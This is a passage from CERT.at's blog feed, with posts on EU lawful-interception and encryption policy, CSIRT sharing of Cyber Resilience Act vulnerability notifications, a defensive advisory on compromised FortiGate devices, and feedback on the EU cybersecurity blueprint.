&lt;p class=&quot;block&quot;&gt;From the LEA side, this is an understandable objective. It misses an important point, though: &amp;ldquo;traditional&amp;rdquo; and &amp;ldquo;non-traditional communication providers&amp;rdquo; are so fundamentally different, that transferring approaches from one side to the other just doesn&amp;rsquo;t work. It starts with territoriality/jurisdiction, touches the services vs. product mismatch and end with the old difference between the old telco networks and the Internet: Are services provided by the network or by the end-points. If you look at the design of Signal and others, all the security properties are in the client, not the server.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Thus, the approach that worked for the old network just doesn&amp;rsquo;t fit the new one.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The HLG report is not giving any guidance how to get there.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Second, it is necessary to reach an agreement on high-level operational requirements that clearly states what is expected by national authorities in terms of lawful interception and what the associated safeguards should be. LEON has been identified as a good basis for defining law enforcement requirements. This document should be accompanied by requirements on e.g. proportionality, oversight and transparency, possibly distinguishing between the rules applicable to content and non-content data, with full respect for cybersecurity and data protection and privacy and without undermining encryption.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is an important point here, and I really think we need to hammer this down.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We first need to agree on a set of requirements for the &amp;ldquo;lawful interception without weakening cyber security &amp;amp; fundamental right&amp;rdquo; solution. &lt;strong&gt;This document is a great summary of what the LEA side wants; we need a similar document that describes the requirements on the cyber security side of the equation.&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Or in other words, we need to checklist according to which we can score any proposed solution X. Some ideas:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Does X restrict what software citizens can install on their devices?&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Does X undermine the goal of having people trust automatic updates of software?&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Does X lead to more people rooting their phones and side-loading applications?&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Does X respect mobile users that travel between jurisdictions?&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Does X also work for Open Source software?&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Does X need to be undetectable by the user under surveillance?&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Does X undermine the security of non-targeted users?&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;What is the abuse potential for X and which guardrails are in place?&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We should agree on such a list of requirements before we embark on the quest to find a solution.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Third, the concept of territorial jurisdiction needs to be clarified in terms of its applicability to OTT services, taking into account the divergent interpretations among national authorities and, most importantly, between national authorities and OTT providers.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is also an interesting point: Jurisdiction. In contrast to an old-fashioned land-line telephone, mobile phone using an OTT communication service are, well, mobile. They can travel. They can leave the current jurisdiction. So what happens if LEA in country Y gets a warrant and support from the OTT service to do wiretapping, and now the suspect travels to country Z. Does the wiretap need to stop? What happens if spyware was used on the suspects phone? Can LEA from Y legally wiretap the communication of a suspect in a different jurisdiction?&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The points 3,4 and 5 from the Recommendation Cluster 7 capture these questions.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Number 4 is crucial: &amp;ldquo;&lt;strong&gt;&lt;em&gt;[&amp;hellip;] no measure should entail an obligation for providers to adjust their ICT systems in a way that would negatively impact the cybersecurity of their users&lt;/em&gt;&lt;/strong&gt;&amp;rdquo;.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;At a recent conference I heard a presentation about the &lt;a href=&quot;https://www.homeaffairs.gov.au/about-us/our-portfolios/national-security/lawful-access-telecommunications/assistance-and-access-industry-assistance-framework&quot;&gt;Australian law for LEA access to communication content&lt;/a&gt;. They do these things in three levels: Asking nicely for help (TAR), force operators to help (TAN) and order that capabilities need to be implemented (TCN). The latter has a strong restriction: &amp;ldquo;Importantly, a TCN is expressly prohibited from requiring the building of a capability to decrypt information or remove electronic protection.&amp;rdquo;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In other words, Australia can demand from communication providers that they build the infrastructure to enable wiretapping, but they can not be forced to lower the inherent security of communication protocols.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 46:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Step 2: [&amp;hellip;] In addition, the HLG experts stressed the urgent need to improve the efficiency of cross-border lawful interception requests under the current framework, while carrying out the work outlined above.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Indeed. The current time-penalty LE is paying for any cross-border interaction is just not sustainable.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 47, Recommendation Cluster 8:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;To ensure that a broad range of providers of ECS, including OTT providers, respond to lawful interception requests as set out in national laws&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is getting tricky. We have seen this play out in other areas, e.g. access to online betting services, pharmacies or other services that are deemed non-compliant in one country. We always deride non-EU countries that block access to Wikipedia, independent media, social media and other &amp;ldquo;undesirable&amp;rdquo; content. What usually follows is an uptick of the use of VPNs and other means of working around blocks. And to be honest, why should an OTT service from south-east Asia care about Austrian law and the wishes of our LEAs? Where do we end here? Try to block these services on the DNS or network layer? Make it illegal to use them? As the report puts it:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;HLG experts agreed that any initiative to foster or impose lawful interception rules on all type of ECS should come with a clear and enforceable framework for taking action against communication providers that operate illegally and/or refuse any form of cooperation with law enforcement.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The authors almost get it&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Furthermore, the differences between lawful interception rules across the EU place burdensome requirements upon regulated entities such as OTT providers, potentially creating market access barriers for communication providers.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;but miss the elephant in the room: It&amp;rsquo;s not about differences in legislation between EU member states, this is a global competition. I don&amp;rsquo;t worry about a company moving from Germany to Spain, I worry about all those OTT services moving to offshore locations. See &lt;a href=&quot;https://www.heise.de/en/news/Surveillance-Proton-relocates-parts-of-its-infrastructure-from-Switzerland-10538664.html&quot;&gt;Proton&amp;rsquo;s move away from Switzerland&lt;/a&gt; for an example.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Page 48, Recommendation Cluster 9:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Based on further analysis and an impact assessment, the experts recommend devising an EU instrument on lawful interception (consisting of soft-law or binding legal instruments) for law enforcement purposes that would establish enforceable obligations for providers of ECS in the EU.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I&amp;rsquo;m a mathematician by training. We often get derided for this, but here is fits perfectly: Before trying to find a solution to a problem, it might be worthwhile to first consider the question if a solution does exist in the first place. So yes: first do the &amp;ldquo;further analysis and an impact assessment&amp;rdquo;, and if &amp;ndash; and only if &amp;ndash; we can find a technical solution satisfying the requirements, then we can start to write laws.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This is what is starting to happen in the EU right now: Experts have been invited to think about this challenge and let&amp;rsquo;s see what they will come up with.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;It certainly is not an easy assignment.&lt;/p&gt;</description><pubDate>Thu, 16 Oct 2025 19:08:16 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2025/10/hlg-paper-review</guid><dc:creator>CERT.at</dc:creator><dc:date>2025-10-16T19:08:16Z</dc:date></item><item><title>Encryption vs. Lawful Interception: EU policy news</title><link>https://www.cert.at/en/blog/2025/7/encryption-vs-lawful-interception-eu-policy-news</link><description>&lt;p class=&quot;block&quot;&gt;I&amp;rsquo;ve commented here on this blog (or its German twin) quite a few time already on various legislative proposals on how the law enforcement agencies can keep their traditional access to the communication of suspects. See&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://www.cert.at/de/blog/2017/8/blog-20170731130131-2076&quot;&gt;Ein paar Thesen zu aktuellen Gesetzesentw&amp;uuml;rfen&lt;/a&gt;&amp;nbsp;(2017)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://www.cert.at/de/blog/2024/9/ein-paar-gedanken-zur-uberwachung-verschlusselter-nachrichten&quot;&gt;Ein paar Gedanken zur &amp;bdquo;&amp;Uuml;berwachung verschl&amp;uuml;sselter Nachrichten&quot;&lt;/a&gt;&amp;nbsp;(2024)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://www.cert.at/en/blog/2024/7/csirt-le-military&quot;&gt;Roles in Cybersecurity: CSIRTs / LE / others&lt;/a&gt;&amp;nbsp;(2024)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;a href=&quot;https://www.cert.at/en/blog/2025/2/chat-control-vs-file-sharing&quot;&gt;Chat Control vs. File Sharing&lt;/a&gt;&amp;nbsp;(2025)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;(by a colleague)&amp;nbsp;&lt;a href=&quot;https://www.cert.at/en/blog/2024/8/another-round-government-malware-digital-surveillance&quot;&gt; Another round: Government malware &amp;amp; digital surveillance&lt;/a&gt;&amp;nbsp;(2024)&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;As the recent political agreement within the new Austrian government shows, this is still a hot topic. This does not only play out on the national side, also at EU level there is a hot debate on the right policy decisions regarding the challenges posed by new communication technology.&lt;/p&gt;&#13;
&lt;p&gt;To be honest, the focus on interception and how law enforcement is now handicapped by the new technology is missing the real story: how the social media companies and their algorithms are fracturing society, causing parallel realities in the population and contribute to the radicalisation of a lot of vulnerable people. That will kill our democracy, not whether a police officer will continue to be able to wiretap a suspect.&lt;/p&gt;&#13;
&lt;p&gt;Anyway, at &lt;a href=&quot;https://ec.europa.eu/commission/presscorner/detail/en/ip_25_1599&quot;&gt;EU level a new Roadmap was unveiled last week&lt;/a&gt;:&lt;/p&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;The European Commission presented today a Roadmap setting out the way forward to ensure law enforcement authorities in the EU have effective and lawful access to data. The roadmap is an important deliverable under ProtectEU &amp;ndash; the EU's Internal Security Strategy which the Commission presented in April this year.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p style=&quot;padding-left: 30px;&quot;&gt;&lt;em&gt;Terrorism, organised crime, online fraud, drug trafficking, child sexual abuse, sexual extortion, ransomware, and other offences all share a common feature: they leave digital traces. With 85% of criminal investigations now relying on electronic evidence, law enforcement authorities need better tools and a modernised legal framework to access digital data in a lawful manner while ensuring full respect of fundamental rights.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p&gt;It covers the areas Data retention, Lawful interception, Digital forensics, Decryption, Standardisation, and AI solutions for law enforcement.&lt;/p&gt;&#13;
&lt;p&gt;While I can understand the frustration on the LE side, some of the proposals run headlong into the core principles of the cyber security community. e.g., under &amp;ldquo;Decryption&amp;rdquo; the Commission writes &amp;ldquo;&lt;em&gt;In 2026, the Commission will present a Technology Roadmap on encryption to identify and evaluate solutions that enable lawful access to encrypted data by law enforcement, while safeguarding cybersecurity and fundamental rights.&lt;/em&gt;&amp;ldquo; which someone in the CSIRT community (to much applause) translated to &amp;bdquo;We have a roadmap for the development of a square that is also round.&amp;ldquo;.&lt;/p&gt;&#13;
&lt;p&gt;To discuss the trade-offs between these worlds, the commission is creating an &amp;ldquo;&lt;a href=&quot;https://ec.europa.eu/transparency/expert-groups-register/screen/expert-groups/consult?lang=en&amp;amp;groupID=4005&quot;&gt;Expert Group for a Technology Roadmap on Encryption (E04005)&lt;/a&gt;&amp;ldquo; and is looking for people to work on the following tasks:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;em&gt;to assist the Commission&amp;rsquo;s Directorate-General for Migration and Home Affairs (&amp;lsquo;DG HOME&amp;rsquo;) and Directorate General for Communications Networks, Content and Technology (&amp;lsquo;DG CNECT) in the preparation of policy initiatives on lawful access to data through the identification of technical options to address encryption challenges and the assessment of their suitability; while ensuring observance of fundamental rights, including privacy and data protection, and without undermining cybersecurity.&lt;/em&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;em&gt;to assist the Commission to elaborate a Technology Roadmap, by providing expert input that shall outline and assess the technical options as well as the corresponding resources and actions needed for lawful access to and processing of digital information, without undermining cybersecurity and while respecting fundamental rights, taking into account the relevant recommendations of the High-Level Group of Experts for Access to Data.&lt;/em&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;They are looking for people with diverse background: The selection shall prioritise experts with technical profiles, coming from either public or private sector, whilst aiming to ensure proportional representation across the following fields of expertise:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;&lt;em&gt;Home affairs, ideally with an experience in fighting high-tech crime, and/or a background in the area of decryption and artifact extraction, computer forensics, network forensics, smartphone forensics, cloud forensics, IoT forensics, memory forensics and/or lawful interception;&lt;/em&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;em&gt;Cybersecurity. with diverse backgrounds including but not limited to vulnerability management, evaluation of cybersecurity risks and certification and encryption (including quantum and post-quantum cryptography);&lt;/em&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;em&gt;Telecommunication, including with experience in computer networks/Internet, 5G/6G, IoT, VoIP, Satellite, Quantum communication and/or encrypted communication applications;&lt;/em&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;em&gt;Big data analysis, including with expertise in AI technologies;&lt;/em&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;em&gt;Standardisation, notably in relation with cybersecurity and/or telecommunication technologies, including protocol networks, exchanges of digital data, and lawful interception;&lt;/em&gt;&lt;/li&gt;&#13;
&lt;li&gt;&lt;em&gt;Justice and fundamental rights, including experience in data protection and privacy, as well as experience in criminal justice, such as cyber-enabled and/or cyber-dependent crimes&lt;/em&gt;&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p&gt;Yes, bitching about EU policy is cherished hobby for a lot of people, but &lt;strong&gt;why not get engaged and try to get the EU to do the right thing in the first place&lt;/strong&gt;?&lt;/p&gt;</description><pubDate>Tue, 01 Jul 2025 14:49:56 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2025/7/encryption-vs-lawful-interception-eu-policy-news</guid><dc:creator>CERT.at</dc:creator><dc:date>2025-07-01T14:49:56Z</dc:date></item><item><title>CRA Vulnerability Reports: why would we not share them with other CSIRTs?</title><link>https://www.cert.at/en/blog/2025/6/cra-vulnerability-reports-why-would-we-not-share-them-with-other-csirts</link><description>&lt;p class=&quot;block&quot;&gt;The Cyber Resilience Act (&lt;a href=&quot;https://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX%3A32024R2847&quot;&gt;Regulation (EU) 2024/2847&lt;/a&gt;) defines security requirements for products with digital elements and requires vendors to report to national CSIRTs if a vulnerability in one of their products is actively exploited.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This reporting is done via a &amp;ldquo;Single Reporting Platform&amp;rdquo; (as defined in Article 16), which is currently being built by ENISA &amp;ndash; after multiple rounds of consultations with the CSIRTs Network.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;One interesting aspect is Article 16(2) which states:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;After receiving a notification, the CSIRT designated as coordinator initially receiving the notification shall, without delay, disseminate the notification via the single reporting platform to the CSIRTs designated as coordinators on the territory of which the manufacturer has indicated that the product with digital elements has been made available.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;But also:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;In exceptional circumstances and, in particular, upon request by the manufacturer and in light of the level of sensitivity of the notified information as indicated by the manufacturer under Article 14(2), point (a), of this Regulation, the dissemination of the notification may be delayed based on justified cybersecurity-related grounds for a period of time that is strictly necessary [&amp;hellip;]&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Article 14(9) expands on this and states:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;padding-left: 30px;&quot;&gt;By 11 December 2025, the Commission shall adopt delegated acts in accordance with Article 61 of this Regulation to supplement this Regulation by specifying the terms and conditions for applying the cybersecurity-related grounds in relation to delaying the dissemination of notifications as referred to in Article 16(2) of this Regulation. The Commission shall cooperate with the CSIRTs network established pursuant to Article 15 of Directive (EU) 2022/2555 and ENISA in preparing the draft delegated acts.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Thus, the EU Commission needs to come up with a set of criteria for us that define when it makes sense to delay passing on a vulnerability notification to peer CSIRTs. Additionally, the Commission needs to talk to us, so it makes sense for us to think about this.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;So, which criteria would be useful to have? Let&amp;rsquo;s pick a few ideas and discuss them.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Keep in mind that we&amp;rsquo;re talking about passing on the information to other CSIRTs in the CSIRT&amp;rsquo;s Network, and not about publishing the information. This makes a huge difference. This leads us to the first reason:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;If there are serious doubts about the trustworthiness of a CSIRT, e.g., because they have a live security incident there or there have been unresolved information leaks there, then it makes sense to cut that team out of the sharing circle.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In our daily CSIRT work, &lt;strong&gt;sharing information is not a binary decision&lt;/strong&gt;. It&amp;rsquo;s rarely &amp;ldquo;all info without any restrictions&amp;rdquo; or &amp;ldquo;no sharing at all&amp;rdquo;. There is a lot of grey between those extremes. On one dimension, it&amp;rsquo;s about what you share. Sometimes we withhold information, because it&amp;rsquo;s not necessary for the receiving CSIRT to accomplish its mission, or we want to protect our sources or the identity of the initial victim. Sharing exploit code is often not needed, so why do it? And the other dimension&amp;nbsp;is information usage and handling restrictions tagged on the information being shared. For this purpose, PAP (Permissible Actions Protocol) markings and TLP (Traffic Light Protocol) markings are applied. For example, we might want to share details of a simple proof-of-concept exploit that can be fashioned into a scanning oracle to find vulnerable systems to all other CSIRTs: that way they can identify which constituents they need to urgently warn about the vulnerability. But passing that scanning script to malicious actors could quickly lead to mass exploitation. This is a perfect example for sharing under TLP:AMBER+STRICT.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;One way to formulate this is:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Do not share the vulnerability notification if the inherent risks of sharing cannot be mitigated by placing restrictions on the handling and onward sharing of the notification by using PAP (Permissible Actions Protocol) and TLP (Traffic Light Protocol) markings.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;This mitigates any fear that the notification might enable the receiver to create an exploit. Thus, anything like &amp;ldquo;this information is too sensitive&amp;rdquo; should not be an excuse not to disseminate.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The next reason I can think of is that the vulnerability notification as received via the SRP does not provide additional useful information to what is already available in the CSIRTs Network. E.g., by writing&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Dissemination can be delayed if all information needed for the relevant CSIRTs to advise and protect their constituency has been shared independently of the vendor notification.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Or the notification could be part of a high-stakes incident response which has been classified under national law. That might legally preclude the CSIRT from discussing aspects of this case with foreign teams. E.g.,&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;If the vulnerability notification is tied to an incident of national security concerns, then the dissemination can be delayed.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;On the other hand, I don&amp;rsquo;t think that pure timing concerns are a valid reason for a delay. We&amp;rsquo;ve been fooled way too often by a vendor&amp;rsquo;s &amp;ldquo;We&amp;rsquo;ll release our public advisory tomorrow.&amp;rdquo; to believe those promises in the first place, and to think an imminent public advisory is a valid reason to delay sharing anyway.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;&lt;strong&gt;Summary&lt;/strong&gt;&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The CSIRTs Network is a trusted group of security teams, sharing even highly sensitive information works, because dealing with TLP-tagged data is our daily business.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Which leaves basically two reasons not to share the original notification:&amp;nbsp;&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;There is a known problem with the security of a CSIRT&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Dissemination is not needed because sufficient information has already been passed around&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&amp;nbsp;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Addendum (2025-12-03)&lt;/strong&gt;: The EU Commission did a &lt;a href=&quot;https://ec.europa.eu/info/law/better-regulation/have-your-say/initiatives/14731-Cybersecurity-terms-conditions-for-delaying-the-notification-of-incidents-delegated-act-_en&quot;&gt;public consultation&lt;/a&gt; on this topic as well.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&amp;nbsp;&lt;/p&gt;</description><pubDate>Wed, 11 Jun 2025 17:49:29 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2025/6/cra-vulnerability-reports-why-would-we-not-share-them-with-other-csirts</guid><dc:creator>CERT.at</dc:creator><dc:date>2025-06-11T17:49:29Z</dc:date></item><item><title>Multiple FortiGate devices compromised with a persistent read-only access</title><link>https://www.cert.at/en/blog/2025/4/multiple-fortigate-devices-compromised-with-a-persistent-read-only-access</link><description>&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot;&gt;&lt;strong&gt;Please note&lt;/strong&gt;: The original author of this post was Kamil Mankowski. Alexander Riepl was merely responsible for publishing and some translation efforts.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot;&gt;On Friday, April 10th, Fortinet &lt;a href=&quot;https://www.fortinet.com/blog/psirt-blogs/analysis-of-threat-actor-activity&quot; target=&quot;_blank&quot;&gt;released information&lt;/a&gt; about a worldwide compromise of FortiGate devices, giving the attacker persistent read-only access. Threat actors seemingly used three known vulnerabilities in the SSL VPN feature to gain initial access to the devices and a symbolic link in the file system to survive patching of FortiOS.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Background&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;FortiGate is a VPN solution that enables remote access to corporate systems. It provides the legacy SSL VPN solution as one of its options. This feature was previously exposed to critical vulnerabilities CVE-2022-42475, CVE-2023-27997 and CVE-2024-21762. Each of these vulnerabilities allowed a remote, unauthenticated attacker to execute code on the device via a specially crafted request.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The attacker used these vulnerabilities to compromise Fortigate devices and then placed a symbolic link in a folder used to serve language files. These are accessible without authentication, allowing anyone knowing the location to gain read-only access to the file system, including the full device configuration. The vulnerability patches provided by Fortinet did not remove the symlink.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The ShadowServer Foundation has &lt;a href=&quot;https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=30&amp;amp;source=compromised_website&amp;amp;tag=fortinet-compromised%2B&amp;amp;dataset=unique_ips&amp;amp;style=stacked&quot; target=&quot;_blank&quot;&gt;identified several thousand compromised devices worldwide&lt;/a&gt;. Our internal analysis shows up to 840 affected devices in Austria at the highest peak, and the current number is slightly higher than the&amp;nbsp; number ShadowServer reports for Austria.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Devices at risk&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;All FortiGate devices, physical or virtual, that have or have had the SSL-VPN feature enabled and were ever vulnerable to one of the mentioned vulnerabilities (see affected FortiOS versions in the advisories - &lt;a href=&quot;https://www.fortiguard.com/psirt/FG-IR-22-398&quot; target=&quot;_blank&quot;&gt;1&lt;/a&gt;, &lt;a href=&quot;https://www.fortiguard.com/psirt/FG-IR-23-09&quot; target=&quot;_blank&quot;&gt;2&lt;/a&gt;, &lt;a href=&quot;https://fortiguard.fortinet.com/psirt/FG-IR-24-015&quot; target=&quot;_blank&quot;&gt;3&lt;/a&gt;) are potentially at risk. &lt;a href=&quot;https://www.cert.govt.nz/advisories/malicious-activity-due-to-previously-exploited-vulnerabilities-in-fortinet-fortios-products/&quot; target=&quot;_blank&quot;&gt;According to CERT.nz&lt;/a&gt;, the attacks could have occurred as early as 2023.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Although the details of the attack have not been made public, CERT.at was informed about this incident by a third party at the beginning of the year. Since then, we have been monitoring the situation in Austria closely and have been actively informing network operators since February.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;According to Fortinet, their active customers have also been contacted.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Mitigation&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;If your device has been compromised, we recommend you initiate an incident response and investigate all activity on the device. Fortinet has also released mitigations, including:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;AV/IPS signatures that flag the malicious symlink - for devices with active IPS&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;FortiOS versions 7.6.2, 7.4.7, 7.2.11 &amp;amp; 7.0.17, 6.4.16 that remove the symlink&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Fortinet has also &lt;a href=&quot;https://community.fortinet.com/t5/FortiGate/Technical-Tip-Recommended-steps-to-execute-in-case-of-a/ta-p/230694&quot; target=&quot;_blank&quot;&gt;published guidelines&lt;/a&gt; to recover compromised devices. If you received our February alert, please note that there are currently updates available that remove the malicious artifact.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Further recommendations&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;We strongly recommend that all FortiGate administrators ensure that their firmware is up to date. For organisations using SSL VPN, we recommend considering a long-term migration to alternative remote access methods due to the long history of security issues. Fortinet offers migration &lt;a href=&quot;https://docs.fortinet.com/document/fortigate/7.6.0/ssl-vpn-to-ipsec-vpn-migration/126460/introduction&quot; target=&quot;_blank&quot;&gt;guides to IPSec&lt;/a&gt; or &lt;a href=&quot;https://docs.fortinet.com/document/fortigate/7.6.2/administration-guide/140089/ssl-vpn-to-dial-up-vpn-migration&quot; target=&quot;_blank&quot;&gt;dial-up VPN&lt;/a&gt; depending on the use case.&lt;/p&gt;</description><pubDate>Wed, 16 Apr 2025 10:22:07 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2025/4/multiple-fortigate-devices-compromised-with-a-persistent-read-only-access</guid><dc:creator>CERT.at</dc:creator><dc:date>2025-04-16T10:22:07Z</dc:date></item><item><title>A Revision of the EU Cybersecurity Blueprint</title><link>https://www.cert.at/en/blog/2025/3/a-revision-of-the-eu-cybersecurity-blueprint</link><description>&lt;h2 class=&quot;block&quot;&gt;Introduction&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;The original &lt;a href=&quot;https://eur-lex.europa.eu/eli/reco/2017/1584/oj/eng&quot;&gt;EU cybersecurity blueprint from 2017&lt;/a&gt; (officially: &amp;ldquo;Commission Recommendation of 13.9.2017 on Coordinated Response to Large Scale Cybersecurity Incidents and Crises&amp;rdquo;) is now close to seven years old and an update is overdue. The Commission recently &lt;a href=&quot;https://digital-strategy.ec.europa.eu/en/library/cyber-blueprint-draft-council-recommendation&quot;&gt;published a draft for an updated version&lt;/a&gt;, and I&amp;rsquo;d like to take this opportunity to publish my feedback to this text.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Overall, this is good document, both readable and quite short. As it is full of references to other EU documents, it would really benefit from a consistent use of hypertext links in the text. There are some URLs in the footnotes, but not all are actually active, clickable links in the pdf version. Having the links directly in the main text might not be standard in EU documents but would make reading the document in its digital form more accessible.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;DNS/Cloud&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Recital (16) and points (15) and (16) single out DNS resolution capabilities as a critical technical dependency. Yes, DNS resolutions is important, but it is by far not the only one. DNS4EU might be a worthwhile EU initiative, but that should not elevate it to a critical component in the EU cybersecurity blueprint.&lt;/p&gt;&#13;
